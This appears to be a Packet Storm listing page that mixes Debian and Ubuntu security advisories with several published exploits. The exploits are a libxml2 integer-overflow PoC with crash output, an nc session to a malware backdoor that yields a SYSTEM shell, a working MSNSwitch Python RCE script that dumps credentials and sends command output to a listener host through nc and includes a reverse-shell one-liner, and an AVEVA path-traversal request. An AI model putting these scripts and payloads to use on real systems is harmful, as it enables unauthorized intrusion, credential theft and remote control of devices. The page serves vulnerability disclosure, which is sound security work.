Debian Linux Security Advisory 5276-1 - Maddie Stone reported a heap-based buffer overflow flaw in pixman, a pixel-manipulation library for X and cairo, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5276-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 12, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : pixmanCVE ID         : CVE-2022-44638Debian Bug     : 1023427Maddie Stone reported a heap-based buffer overflow flaw in pixman, apixel-manipulation library for X and cairo, which could result in denialof service or potentially the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 0.40.0-1.1~deb11u1.We recommend that you upgrade your pixman packages.For the detailed security status of pixman please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/pixmanFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKSBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNvmIhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0ToTQ/3bIRPJMysz984NBivSyxdCCD4If1AjwKLr+At3fHCJVs3BrzY/K+nBMlWSkzBVcWGnIyJ7WF50DKwnEflUrjDBLMrYN6v+PEXgZGSWsTsyy4pcmJxYwZsyxJvZv0uuqEKT2VAFIG8MjAVNjCzRadJnLzCi7EFvheMiRXpWMMUt3DlOvtu+075TXW65n1TgBbgVSqGtg83oRoCqU213nxgkYhdxASHTLPqU8GIYUtIngbRpk/mPy+NZKDtcofrpqnd5QuRngkRvqqFs7h0u3U0bFVO7miG0mMJWAm/QNZN5NLNoxfZrBUhoZWgjGJ1tu6NQVggAmb3rb6DCNwWKVnCqFyZOaInDcq9Up6Rh+NbLMMhUm0ghFKp+rr2sWZ+Pmnn4tnvZLb47kJDUk7ZP/LCC9q6hd5yFpKdRTxCznCH+9gmxfqOKSW5qBgWyCsbVySLQcuNZwRf1zgynkilNgyKcRNUnMeZU7FZVB9zABxwWqgD/ZVJIKhts5mq6hyLKXwTzwtQ0Kw7kYHkRya3hv6BFwJm7saKhHKySGb7JceFz2udBUoeA9y/pgGSGEJUWenuuQ0LVKH8QflbsfI8jlVKdUlHEYVrYo2yjULr9rraURabK6OClmrs9JI3Fg6PEl/wwh+SKmdeJZqOY4Vse4ZxcRfN0sGtiu1hfqTM6owm8Q==0y3/-----END PGP SIGNATURE-----

Debian Security Advisory 5276-1

Node-saml and its partner project passport-saml are vulnerable to an authentication bypass due to lax parsing of SAML responses.

Node-saml Root Element Signature Bypass

libxml2 suffers from an integer overflow vulnerability in xmlParseNameComplex.

    libxml2: Integer overflow in xmlParseNameComplexlibxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters).```static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) {int len = 0, l;[...]return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));}```If the name is greater than or equal to 2**32 characters, then `len` overflows. The calculation for the second argument to xmlDictLookup (`ctxt->input->cur - len`) will point to an address outside of the buffer such as adding 0x80000000 to `cur`.Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. Though similar to Felix’s report [$CVE-2022-29824$](https://gitlab.gnome.org/GNOME/libxml2/-/issues/351) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this._Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._Proof of Concept:```$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml$ ./xmllint --huge /tmp/name_big.xmlProgram received signal SIGSEGV, Segmentation fault.__strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:7777  ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory.(gdb) bt#0  __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77#1  0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)    at /usr/local/google/home/maddiestone/libxml2/dict.c:878#2  0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617#3  0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682#4  0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729#5  0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754#6  0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407#7  0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165#8  0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0)    at /usr/local/google/home/maddiestone/libxml2/parser.c:17044#9  0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128)    at /usr/local/google/home/maddiestone/libxml2/parser.c:17109#10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0)    at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366#11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757(gdb) up#1  0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)    at /usr/local/google/home/maddiestone/libxml2/dict.c:878878            l = strlen((const char *) name);(gdb) up#2  0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:36173617        return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));(gdb) p/x len$5 = 0x80000000(gdb) p/x $_siginfo$6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e,      si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e,      si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0,      si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = {      si_band = 0x7ffff795602e, si_fd = 0x0}}}(gdb) p/x ctxt->input->cur$7 = 0x7fff7795602e```Related CVE Numbers: CVE-2022-29824,CVE-2022-40303.Found by: Google Security Research

libxml2 xmlParseNameComplex Integer Overflow

libxml2 suffers from a double-free vulnerability when parsing default attributes.

libxml2 Attribute Parsing Double-Free

Backdoor.Win32.RemServ.d malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.RemServ.dVulnerability: Unauthenticated Remote Command ExecutionFamily: RemServType: PE32MD5: 05a082d441d9cf365749c0e1eb904c85Vuln ID: MVID-2022-0655Disclosure: 11/11/2022Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".Exploit/PoC:C:\>nc64.exe x.x.x.x 26103Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\>whoamiwhoamint authority\systemC:\>net usernet userUser accounts for \\----------------------------------------------------------------------------Administrator            DefaultAccount           GuestVictim                   WDAGUtilityAccountThe command completed with one or more errors.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.RemServ.d MVID-2022-0655 Remote Command Execution

Ubuntu Security Notice 5724-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, bypass Content Security Policy or other security restrictions, or execute arbitrary code. These issues only affect Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5724-1November 11, 2022thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,bypass Content Security Policy (CSP) or other security restrictions, orexecute arbitrary code. These issues only affect Ubuntu 18.04 LTS, Ubuntu20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-3266, CVE-2022-40956,CVE-2022-40957, CVE-2022-40958, CVE-2022-40959, CVE-2022-40960,CVE-2022-40962)Multiple security issues were discovered in the Matrix SDK bundled withThunderbird. An attacker could potentially exploit these in order toimpersonate another user. These issues only affect Ubuntu 18.04 LTS,Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-39236, CVE-2022-39249,CVE-2022-39250, CVE-2022-39251)Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, or execute arbitrary code. (CVE-2022-42927,CVE-2022-42928, CVE-2022-42929, CVE-2022-42932)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  thunderbird                     1:102.4.2+build2-0ubuntu0.22.10.1Ubuntu 22.04 LTS:  thunderbird                     1:102.4.2+build2-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.4.2+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  thunderbird                     1:102.4.2+build2-0ubuntu0.18.04.1After a standard system update you need to restart Thunderbird to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5724-1  CVE-2022-3266, CVE-2022-39236, CVE-2022-39249, CVE-2022-39250,  CVE-2022-39251, CVE-2022-40956, CVE-2022-40957, CVE-2022-40958,  CVE-2022-40959, CVE-2022-40960, CVE-2022-40962, CVE-2022-42927,  CVE-2022-42928, CVE-2022-42929, CVE-2022-42932Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.4.2+build2-0ubuntu0.22.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.4.2+build2-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.4.2+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.4.2+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5724-1

Debian Linux Security Advisory 5275-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5275-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 10, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-3885 CVE-2022-3886 CVE-2022-3887 CVE-2022-3888                  CVE-2022-3889 CVE-2022-3890Debian Bug     : 1015931Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 107.0.5304.110-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmNtfY4ACgkQEMKTtsN8TjZLvxAAvmCm9B1VLb796NtQl5od/hZsL0jGq0mE3iq8N2n6HE0/0aS+/O8sLwFDE3NlnY+zjuNkkSMisb0m7idfp7LNcCV6IkaO/nj48sUVOKKDvbUp+OpVR852EPtovmV2deYfHM9gl6IM55HTQyvDtlJGQwotO2xT7RSF6lho/LbKP/RRp7KFyanUmzRE3iRFSvSL5NLGN1YmNeosiPem9R/AmVMq6rC7D3wyUIKodfl5IY7G7DgzV/NbPq+zVPeCJG1Rg7I/ssY6/cfOz6/9gj0E7CcgfB7oYPwuoTw63mLny794B/UHfb861FkeNaIKEW8KW0h7nlwLVP579nJsQNLmcyHC0Xb7dayyOa52oyJgRVSLRSStz71ZJdLTogVW4f8pHgH14q1R82WRw3yIaq537+Ui2kmjeIP2yljrtJkzoe1vCa9vPRhV8Cr2yc3Zwx9EPLJ0WJG7JVhHCwhHt2F1XK8RJpdmZq9leCpPC9zuxYkPJQzziuu35AewSUpd0I2i/6i1rhF+kQBmKRA8zjCrw5K1I5WwF6OAXFPsRLHJbe0S87OupLX8YwI33r5buavyfIg7niL3h87qaV2xO87rG/KNruqqRiCrROGK/t/y/m0nSHYs44gA+DSocncz4bLfMnfZ70OU7vTupYTVtpNadtYVFVuismlexUM+3APOHjc==EgjK-----END PGP SIGNATURE-----

Debian Security Advisory 5275-1

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

TOR Virtual Network Tunneling Tool 0.4.7.11

MSNSwitch Firmware MNT.2408 suffers from a remote code execution vulnerability.

    Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)Google Dork: n/aDate:9/1/2022Exploit Author: Eli FulkersonVendor Homepage: https://www.msnswitch.com/Version: MNT.2408Tested on: MNT.2408 firmwareCVE: CVE-2022-32429#!/usr/bin/python3"""POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.Configuration dump only requires HTTP access.Full RCE requires you to be on the same subnet as the device.""" import requestsimport sysimport urllib.parseimport readlineimport randomimport string# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOSTLISTENER_HOST = "192.168.EDIT.ME"LISTENER_PORT = 3434# target msnswitchTARGET="192.168.EDIT.ME2"PORT=80USERNAME = NonePASSWORD = None"""First vulnerability, unauthenticated configuration/credential dump"""if USERNAME == None or PASSWORD == None:  # lets just ask  hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  session = requests.session()  data = session.get(hack_url)  for each in data.text.split('\n'):    key = None    val = None    try:      key = each.strip().split('=')[0]      val = each.strip().split('=')[1]    except:      pass    if key == "Account1":      USERNAME = val    if key == "Password1":      PASSWORD = val"""Second vulnerability, authenticated command executionThis only works on the local lan.for full reverse shell, modify and upload netcat busybox shell script to /tmp:  shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmpref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox"""session = requests.session()# initial login, establishes our Cookieburp0_url = f"http://{TARGET}:{PORT}/goform/login"burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}session.post(burp0_url, headers=burp0_headers, data=burp0_data)# get our csrftokenburp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"data = session.get(burp0_url)csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]while True:  CMD = input('x:')  CMD_u = urllib.parse.quote_plus(CMD)  filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  try:    hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"    session.get(hack_url, timeout=0.01)  except requests.exceptions.ReadTimeout:    pass

MSNSwitch Firmware MNT.2408 Remote Code Execution

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 suffers from a path traversal vulnerability.

    Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path TraversalExploit Author: Jens Regel (CRISEC IT-Security)Date: 11/11/2022CVE: CVE-2022-23854Version: Access Anywhere Secure Gateway versions 2020 R2 and olderProof of Concept:GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1HTTP/1.1 200 OKServer: EricomSecureGateway/8.4.0.26844.*(..); for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1

Source

Packet Storm